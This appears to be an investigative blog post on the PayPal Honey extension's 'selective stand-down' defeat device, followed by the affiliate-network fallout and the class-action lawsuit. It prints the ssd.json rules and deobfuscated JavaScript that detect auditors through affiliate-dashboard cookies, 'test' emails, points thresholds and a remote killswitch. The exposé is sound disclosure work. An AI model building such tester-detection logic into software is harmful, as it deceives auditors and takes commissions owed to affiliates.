<p>Some context first. Affiliate networks (Rakuten Advertising, CJ, Impact, Awin) have known since 2002 that browser extensions are natural parasites in this ecosystem. So they created a contractual rule called <strong>stand down</strong>: if the user already arrived at the store through another affiliate&rsquo;s link, the extension must deactivate itself and not interfere. Period. It&rsquo;s written into the contracts. Rakuten&rsquo;s policy, for instance, says the publisher must <em>&ldquo;stand down and not display any forms of sliders or pop-ups&rdquo;</em> when another affiliate has already referred the user, and <em>&ldquo;must not force clicks or cookie stuff.&rdquo;</em></p>
<p>And Honey complied. Technically. When tested.</p>
<p>Which brings us to the heart of the third video, what MegaLag calls Cookie Gate, and his analogy is exact: Volkswagen&rsquo;s Dieselgate. VW programmed its cars to lower emissions only during lab tests. Honey programmed its extension to respect stand down only when it detected the user was probably an auditor.</p>
<blockquote>
  <p><strong>Remember this:</strong> stand down has been a contractual obligation since 2002, not a courtesy. If the user arrived at the store through another affiliate&rsquo;s link, the extension must back off. Honey backed off only when the user smelled like an auditor.</p>

</blockquote>
<h2>The evidence: ssd.json, line by line<span class="hx:absolute hx:-mt-20" id="the-evidence-ssdjson-line-by-line"></span>
    <a href="#the-evidence-ssdjson-line-by-line" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>After PayPal bought Honey, the extension was rewritten and the rules started arriving in plain text from a server. That let MegaLag expose the entire mechanism, and let Ben Edelman, the security researcher who worked the eBay affiliate-fraud case in the 2000s, verify all of it independently (<a href="https://www.benedelman.org/honey-detecting-testers/"target="_blank" rel="noopener">his full analysis here</a>).</p>
<p>First architectural point: <strong>the stand-down rules live in the cloud, not in the extension</strong>. The extension fetches two JSON files from Honey&rsquo;s servers and checks for updates every hour: <code>standdown-rules.json</code> (the normal rules) and <code>ssd.json</code> (the <em>selective stand-down</em> rules). Meaning: PayPal could change the behavior of ~14 million users within an hour, with no extension update, no Chrome Web Store review, no one watching.</p>
<p>Second: the normal rules were already a joke. The stand-down timer, how long Honey respects the original affiliate&rsquo;s cookie, was 3,600 seconds. One hour. Clicked your favorite YouTuber&rsquo;s link in the morning, bought in the afternoon, Honey could act again. And a 2023 Wayback Machine capture shows it was once <strong>360 seconds. Six minutes</strong>. As MegaLag says, it takes him more than six minutes just to type in his credit card. No affiliate network defines any such expiry. Honey made one up.</p>
<p>Third, the main course. This is the <code>ssd.json</code> captured on October 22, 2025 (comments are mine):</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-json" data-lang="json"><span class="line"><span class="cl"><span class="p">{</span><span class="nt">&#34;ssd&#34;</span><span class="p">:</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">  <span class="nt">&#34;base&#34;</span><span class="p">:</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nt">&#34;gca&#34;</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span>      <span class="c1">// check for affiliate console cookies
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;bl&#34;</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span>       <span class="c1">// check the server-side blacklist
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;uP&#34;</span><span class="p">:</span> <span class="mi">65000</span><span class="p">,</span>   <span class="c1">// minimum points to IGNORE stand down
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;adb&#34;</span><span class="p">:</span> <span class="mi">26298469858850</span>
</span></span><span class="line"><span class="cl">  <span class="p">},</span>
</span></span><span class="line"><span class="cl">  <span class="c1">// domains where &#34;industry insider&#34; cookies get checked:
</span></span></span><span class="line"><span class="cl">  <span class="nt">&#34;affiliates&#34;</span><span class="p">:</span> <span class="p">[</span><span class="s2">&#34;https://www.cj.com&#34;</span><span class="p">,</span> <span class="s2">&#34;https://www.linkshare&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                 <span class="s2">&#34;https://www.rakuten.com&#34;</span><span class="p">,</span> <span class="s2">&#34;https://ui.awin.com&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">                 <span class="s2">&#34;https://www.swagbucks.com&#34;</span><span class="p">],</span>
</span></span><span class="line"><span class="cl">  <span class="nt">&#34;LS&#34;</span><span class="p">:</span> <span class="p">{</span> <span class="nt">&#34;uP&#34;</span><span class="p">:</span> <span class="mi">5001</span> <span class="p">},</span>  <span class="c1">// Rakuten exception (formerly LinkShare)
</span></span></span><span class="line"><span class="cl">  <span class="nt">&#34;PAYPAL&#34;</span><span class="p">:</span> <span class="p">{</span> <span class="nt">&#34;uL&#34;</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="nt">&#34;uP&#34;</span><span class="p">:</span> <span class="mi">5000001</span><span class="p">,</span> <span class="nt">&#34;adb&#34;</span><span class="p">:</span> <span class="mi">26298469858850</span> <span class="p">}</span>
</span></span><span class="line"><span class="cl">  <span class="p">},</span>
</span></span><span class="line"><span class="cl">  <span class="nt">&#34;ex&#34;</span><span class="p">:</span> <span class="p">{</span>  <span class="c1">// per-store exceptions (Honey internal IDs)
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;7555272277853494990&#34;</span><span class="p">:</span> <span class="p">{</span> <span class="nt">&#34;uP&#34;</span><span class="p">:</span> <span class="mi">5001</span> <span class="p">},</span>                         <span class="c1">// TJ Maxx
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;7394089402903213168&#34;</span><span class="p">:</span> <span class="p">{</span> <span class="nt">&#34;uL&#34;</span><span class="p">:</span> <span class="mi">1</span><span class="p">,</span> <span class="nt">&#34;adb&#34;</span><span class="p">:</span> <span class="mi">120000</span><span class="p">,</span> <span class="nt">&#34;uP&#34;</span><span class="p">:</span> <span class="mi">1001</span> <span class="p">},</span> <span class="c1">// Booking.com
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;243862338372998182&#34;</span><span class="p">:</span> <span class="p">{</span> <span class="nt">&#34;uL&#34;</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span> <span class="nt">&#34;uP&#34;</span><span class="p">:</span> <span class="mi">100000</span> <span class="p">},</span>               <span class="c1">// Kayo Sports
</span></span></span><span class="line"><span class="cl">    <span class="c1">// cookies to look for, in the SAME ORDER as the domains above:
</span></span></span><span class="line"><span class="cl">    <span class="nt">&#34;GA&#34;</span><span class="p">:</span> <span class="p">[</span><span class="s2">&#34;CONTID&#34;</span><span class="p">,</span> <span class="s2">&#34;s_vi&#34;</span><span class="p">,</span> <span class="s2">&#34;_ga&#34;</span><span class="p">,</span> <span class="s2">&#34;networkGroup&#34;</span><span class="p">,</span> <span class="s2">&#34;_gid&#34;</span><span class="p">]</span>
</span></span><span class="line"><span class="cl">  <span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>How it works: when the extension detects you clicked an affiliate link, it consults these rules before deciding whether to honor stand down:</p>
<ul>
<li><strong><code>uL</code></strong> (user logged in): you must be logged into a Honey account.</li>
<li><strong><code>uA</code></strong> (user account age): your account must be a minimum age, 30 days, in milliseconds, <em>&ldquo;for whatever reason,&rdquo;</em> as MegaLag notes. A brand-new account is the signature of someone testing the extension for an audit.</li>
<li><strong><code>uP</code></strong> (user points): you must have accumulated a minimum of cashback points. In the current config: 65,000 points. Since 1,000 points redeem for $10 in gift cards, that&rsquo;s $650 in lifetime earnings, which rules out virtually every real user and certainly every auditor on a test account.</li>
<li><strong><code>bl</code></strong> (blacklist): the server can flag your ID, cookie, or IP (anyone who ever complained about Honey, say) and treat you as &ldquo;high risk.&rdquo;</li>
<li><strong><code>gca</code></strong>: the most incriminating of all, and it gets its own paragraph.</li>
</ul>
<p>If you pass every filter, the system classifies you as a legitimate consumer and Honey <strong>ignores stand down</strong> and takes the commission. Fail any one, it classifies you as a possible auditor and Honey behaves impeccably. Edelman sums it up: <em>&ldquo;Honey stands down, but only sometimes. And the sometimes is predictable.&rdquo;</em> Deterministic, actually: same conditions, same result, reproducible.</p>
<h3>The gca: checking your pockets for an inspector&rsquo;s badge<span class="hx:absolute hx:-mt-20" id="the-gca-checking-your-pockets-for-an-inspectors-badge"></span>
    <a href="#the-gca-checking-your-pockets-for-an-inspectors-badge" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>The <code>gca</code> is the digital equivalent of patting you down for a regulator&rsquo;s badge. The <code>affiliates</code> and <code>GA</code> lists are positionally paired: on the <code>cj.com</code> domain, look for the <code>CONTID</code> cookie; on <code>linkshare</code>, <code>s_vi</code>; on <code>ui.awin.com</code>, <code>networkGroup</code>. The code, recovered via <code>sourceMappingURL</code> from the iOS app that leaked practically unobfuscated:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="nx">m</span> <span class="o">=</span> <span class="nx">p</span><span class="p">.</span><span class="nx">ex</span> <span class="o">&amp;&amp;</span> <span class="nx">p</span><span class="p">.</span><span class="nx">ex</span><span class="p">.</span><span class="nx">GA</span> <span class="o">||</span> <span class="p">[]</span>
</span></span><span class="line"><span class="cl"><span class="nx">g</span> <span class="o">=</span> <span class="nx">i</span><span class="p">().</span><span class="nx">map</span><span class="p">(</span><span class="nx">p</span><span class="p">.</span><span class="nx">ssd</span> <span class="o">&amp;&amp;</span> <span class="nx">p</span><span class="p">.</span><span class="nx">ssd</span><span class="p">.</span><span class="nx">affiliates</span><span class="p">,</span> <span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="k">return</span> <span class="nx">f</span> <span class="o">+=</span> <span class="mi">1</span><span class="p">,</span> <span class="nx">u</span><span class="p">.</span><span class="nx">A</span><span class="p">.</span><span class="nx">get</span><span class="p">({</span>
</span></span><span class="line"><span class="cl">        <span class="nx">name</span><span class="o">:</span> <span class="nx">m</span><span class="p">[</span><span class="nx">f</span><span class="p">],</span> <span class="c1">// cookie name from the GA array
</span></span></span><span class="line"><span class="cl">        <span class="nx">url</span><span class="o">:</span> <span class="nx">e</span>      <span class="c1">// domain to check
</span></span></span><span class="line"><span class="cl">    <span class="p">}).</span><span class="nx">then</span><span class="p">((</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">        <span class="nx">e</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">o</span><span class="p">.</span><span class="nx">gca</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span> <span class="c1">// cookie found: gca = 0, enter compliance mode
</span></span></span><span class="line"><span class="cl">    <span class="p">}))</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>If you carry a login cookie from the CJ, Rakuten, or Awin affiliate dashboards, that is, if you work in the industry, Honey honors stand down on everything, always, no matter the link. MegaLag discovered this by accident while testing his own extension (Cookie Guard): he logged into his CJ affiliate account in another tab, and suddenly Honey turned into an angel.</p>
<p>And notice the cynical design detail: domains and cookie names sit in two separate lists instead of name-value pairs. As Edelman points out, the effect is to make the relationship between them harder to spot for anyone skimming the file.</p>
<p>Edelman is categorical about what this means: there is no legitimate reason for a coupon extension to check whether you logged into an affiliate dashboard. The only function is hiding from the people who enforce the rules. And whoever hides knows they&rsquo;re doing something prohibited.</p>
<h3>The other tricks: the &ldquo;test&rdquo; email, the killswitch, and eBay<span class="hx:absolute hx:-mt-20" id="the-other-tricks-the-test-email-the-killswitch-and-ebay"></span>
    <a href="#the-other-tricks-the-test-email-the-killswitch-and-ebay" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>Two more gems in the code. The extension scans your email address for the word &ldquo;test&rdquo;. Found it, compliance mode:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="k">if</span> <span class="p">(</span><span class="nx">r</span><span class="p">.</span><span class="nx">email</span> <span class="o">&amp;&amp;</span> <span class="nx">r</span><span class="p">.</span><span class="nx">email</span><span class="p">.</span><span class="nx">match</span><span class="p">(</span><span class="s2">&#34;test&#34;</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">o</span><span class="p">.</span><span class="nx">bl</span> <span class="o">=</span> <span class="mi">0</span><span class="p">),</span> <span class="o">!</span><span class="nx">r</span><span class="p">.</span><span class="nx">isLoggedIn</span> <span class="o">||</span> <span class="nx">t</span><span class="p">)</span> <span class="p">{</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>And there&rsquo;s a master killswitch on the server: the extension periodically fetches a URL, and depending on the response the entire SSD system turns on or off:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="k">return</span> <span class="nx">e</span><span class="p">.</span><span class="nx">next</span> <span class="o">=</span> <span class="mi">7</span><span class="p">,</span> <span class="nx">fetch</span><span class="p">(</span><span class="s2">&#34;&#34;</span><span class="p">.</span><span class="nx">concat</span><span class="p">(</span><span class="s2">&#34;https://s.joinhoney.com&#34;</span><span class="p">,</span> <span class="s2">&#34;/ck/alive&#34;</span><span class="p">));</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="nx">c</span> <span class="o">=</span> <span class="nx">S</span><span class="p">().</span><span class="nx">then</span><span class="p">((</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="nx">e</span> <span class="o">&amp;&amp;</span> <span class="s2">&#34;alive&#34;</span> <span class="o">===</span> <span class="nx">e</span><span class="p">.</span><span class="nx">is</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="nx">o</span><span class="p">.</span><span class="nx">bl</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">}))</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>One flip on the server and 14 million extensions go into compliance mode instantly. Handy, say, on the day a big audit gets announced.</p>
<p>And eBay? eBay gets VIP treatment, straight in the code: while normal stand down lasts one hour, eBay&rsquo;s lasts 86,400 seconds (24 hours), and the SSD logic is explicitly disabled for eBay domains:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="s2">&#34;regex&#34;</span><span class="o">:</span> <span class="s2">&#34;^https?\\:\\/\\/rover\\.ebay((?![\\?\\&amp;]pub=5575133559).)*$&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="s2">&#34;provider&#34;</span><span class="o">:</span> <span class="s2">&#34;LS&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="s2">&#34;overrideBl&#34;</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="s2">&#34;ttl&#34;</span><span class="o">:</span> <span class="mi">86400</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="nx">a</span> <span class="o">=</span> <span class="s2">&#34;ssd&#34;</span> <span class="o">===</span> <span class="nx">r</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="sr">/ebay/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">p</span><span class="p">);</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Why? Because in 2008 eBay brought civil and criminal charges against its two biggest affiliates, Shawn Hogan and Brian Dunning, who collected over $20 million in 18 months running cookie-stuffing schemes, and both went to jail. Edelman himself helped catch them. Honey knew exactly who not to mess with. The rest of the market, apparently, was fair game.</p>
<h3>Telemetry: the evidence that documents itself<span class="hx:absolute hx:-mt-20" id="telemetry-the-evidence-that-documents-itself"></span>
    <a href="#telemetry-the-evidence-that-documents-itself" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>The part that made my jaw drop: from day one, the defeat device <strong>logged every decision it made</strong>. When the extension decides to honor stand down, it sends telemetry with <code>&quot;method&quot;:&quot;suspend&quot;</code> and a <code>state</code> saying exactly which rule fired, <code>&quot;uP:5001&quot;</code>, <code>&quot;gca&quot;</code>, <code>&quot;ssd&quot;</code>, along with the original affiliate link, which frequently contains the stiffed affiliate&rsquo;s ID and sometimes their name.</p>
<p>Somewhere on PayPal&rsquo;s servers sits a detailed record of every commission this system helped steal. MegaLag closes the fourth video urging the networks to demand that data and claw the money back. Hard to argue with that.</p>
<h3>How MegaLag proved it on the public extension<span class="hx:absolute hx:-mt-20" id="how-megalag-proved-it-on-the-public-extension"></span>
    <a href="#how-megalag-proved-it-on-the-public-extension" class="subheading-anchor" aria-label="Permalink for this section"></a></h3><p>One bit of engineering that deserves respect. After the first video, PayPal raised the base threshold to 65,000 points, effectively switching the mechanism off for nearly everyone and narrowing the sketchy behavior. Except whoever edited the <code>ssd.json</code> forgot the Rakuten exception: <code>&quot;LS&quot;: {&quot;uP&quot;: 5001}</code>.</p>
<p>MegaLag went on what he calls a <em>&ldquo;painfully expensive shopping spree&rdquo;</em> until he crossed 5,000 points, and reproduced the fraud on the public extension, untouched, without modifying a single line. (Edelman did it the easy way: he intercepted the server&rsquo;s response with Fiddler and lied about his own points balance. His code is in the article linked above.)</p>
<h2>The PayPal rewrite<span class="hx:absolute hx:-mt-20" id="the-paypal-rewrite"></span>
    <a href="#the-paypal-rewrite" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The system&rsquo;s genealogy, reconstructed by MegaLag from ~300 archived extension builds going back to 2014:</p>
<ul>
<li><strong>October 2017</strong>: the SSD first appears, in version 10.5.2, still under founders Ryan Hudson and George Ruan, but encrypted, scrambled, unreadable to anyone who stumbled on it. Researcher Wladimir Palant had already documented in 2020 that Honey concealed chunks of its own code.</li>
<li><strong>March 2021</strong>: under PayPal, version 13.1.0, <strong>the entire system was rebuilt</strong>. The rules were restructured into a new format and started living in plain text on PayPal&rsquo;s servers. That careless rewrite is what exposed everything.</li>
</ul>
<p>Hold that thought and compare it with PayPal&rsquo;s official statement after the roof caved in:</p>
<blockquote>
  <p><em>&ldquo;The code causing this behavior has been identified and no longer has an impact. The code was implemented prior to PayPal&rsquo;s acquisition and appears to affect less than 0.1% of Honey&rsquo;s traffic.&rdquo;</em></p>
<p>— PayPal to Hello Partner, January 2026</p>

</blockquote>
<p>MegaLag calls that what it is: a lie. You don&rsquo;t rebuild a system from scratch, tune its rules year after year, and then claim you had no idea it existed.</p>
<p>The timeline gives it away: MegaLag asked PayPal for comment on December 18, 2025; they called the accusations <em>&ldquo;not accurate&rdquo;</em> and sent the lawyers after him. Rakuten cut Honey from its network on January 12, 2026. The defeat device was deactivated on January 13, one day later, almost a month after the warning. And &ldquo;0.1% of traffic&rdquo; is empty rhetoric: the rules live on the server, so the targeting was always remotely tunable. Under the 2023 rules, the target was practically everyone.</p>
<h2>The fallout<span class="hx:absolute hx:-mt-20" id="the-fallout"></span>
    <a href="#the-fallout" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>After Cookie Gate, things moved:</p>
<ul>
<li><strong>Rakuten Advertising</strong> (January 12, 2026): terminated Honey from the entire network, more than 2,000 stores, including Walmart, Lego, Sephora, Newegg, Uniqlo, and Samsung. The sordid detail: internal emails that surfaced in the litigation show Rakuten knew about stand-down violations as early as July 2020 and kept Honey anyway, and PayPal even replied that Rakuten&rsquo;s stand-down policies were <em>&ldquo;overreach.&rdquo;</em> In May 2026 Rakuten quietly let Honey back in, after publishing an <a href="https://github.com/rakutenrewards/PublisherStandown-SDK"target="_blank" rel="noopener">open-source stand-down SDK</a> that Honey implemented.</li>
<li><strong>Impact</strong> (January 16): removed Honey from its discovery marketplace and suspended the account, confirming a breach of <em>&ldquo;universal stand-down requirements.&rdquo;</em></li>
<li><strong>Awin</strong> (January 21): the biggest network affected, with over 16,000 merchants. Confirmed <em>&ldquo;breaches of our publisher policies,&rdquo;</em> suspended payments, and imposed a remediation plan that includes <strong>giving the networks access to Honey&rsquo;s source code</strong>.</li>
<li><strong>Google</strong>: in March 2025 the Chrome Web Store started requiring a <em>&ldquo;direct and transparent user benefit&rdquo;</em> for any extension injecting affiliate links. Honey&rsquo;s workaround was switching on 0.1% to 1% cashback at nearly every partner store. Technically a benefit, practically loose change.</li>
<li><strong>The market responded</strong>: Honey lost about 7 million users (from 20 million to 14), over 7,000 stores (from ~35,000 to ~28,000), and the coupon database shrank from ~90,000 to ~50,000 codes. Apple, which alone generated more monetizable traffic than the bottom 27,000 stores combined, walked.</li>
</ul>


<div class="embed-container">
  <iframe
    src="https://www.youtube.com/embed/EXDemfGNGz0"
    title="YouTube video player"
    frameborder="0"
    allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share"
    referrerpolicy="strict-origin-when-cross-origin"
    allowfullscreen>
  </iframe>
</div>

<h2>The class action<span class="hx:absolute hx:-mt-20" id="the-class-action"></span>
    <a href="#the-class-action" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Here&rsquo;s where David meets Goliath in court. Days after the first video, on December 29, 2024, Wendover Productions (Sam Denby&rsquo;s company) filed the first suit; Devin Stone of LegalEagle, an actual attorney, organized the effort, and some twenty firms filed similar complaints across several states, with GamersNexus as lead plaintiff in one of them. The cases were consolidated in the Northern District of California: <em>In re PayPal Honey Browser Extension Litigation</em>, case 5:24-cv-09470-BLF, Judge Beth Labson Freeman.</p>
<p>The claims in the current complaint: unjust enrichment, intentional interference with contractual relations and with prospective economic advantage, violations of the Computer Fraud and Abuse Act (the American anti-hacking law), California&rsquo;s computer data access and fraud statute, and the unfair competition laws of California and Washington.</p>
<p>The procedural timeline is a soap opera:</p>
<ul>
<li><strong>November 2025</strong>: PayPal tried to force arbitration and lost. Weeks later, Judge Freeman dismissed the first complaint, with leave to amend, because the affiliate contracts were with the merchants, not PayPal, and the Monte Carlo simulation the plaintiffs used to estimate damages didn&rsquo;t persuade her. Ryan Hudson tweeted <em>&ldquo;Case dismissed&rdquo;</em> and did a little victory lap. Hello Partner, the industry trade publication that had Honey as premier sponsor of its flagship conference, rushed out a piece on <em>&ldquo;what MegaLag got wrong.&rdquo;</em></li>
<li><strong>January 2026</strong>: the second complaint arrived at 101 pages, ten named plaintiffs, the actual merchant contracts, test-purchase evidence and, crucially, the Cookie Gate findings baked in. Page 65 describes the defeat device in detail: <em>&ldquo;PayPal devised several methods to ignore or circumvent stand down protocols,&rdquo;</em> including detecting visits to affiliate network websites, which the complaint calls <em>&ldquo;arguably the most glaring reveal of PayPal&rsquo;s bad intent.&rdquo;</em></li>
<li><strong>June 4, 2026</strong>: second hearing. The judge warned PayPal&rsquo;s attorney, Richard Jacobson, the same lawyer who signed the cease-and-desist against MegaLag, that he had <em>&ldquo;an uphill battle.&rdquo;</em> When the defense argued that affiliate IDs are <em>&ldquo;just short strings of numbers and letters&rdquo;</em> with no intrinsic value, the judge replied that you could say the same thing about a dollar bill. Jacobson: <em>&ldquo;I don&rsquo;t know how to respond to that.&rdquo;</em></li>
<li><strong>June 22, 2026</strong>: the motion to dismiss was <strong>denied in full</strong>. Every claim survived. The case now moves into discovery: internal documents, communications, depositions, possibly of the founders and PayPal&rsquo;s own engineers. Trial, if it happens, late 2027. MegaLag&rsquo;s guess, and mine too: PayPal will try to settle to bury those depositions.</li>
</ul>
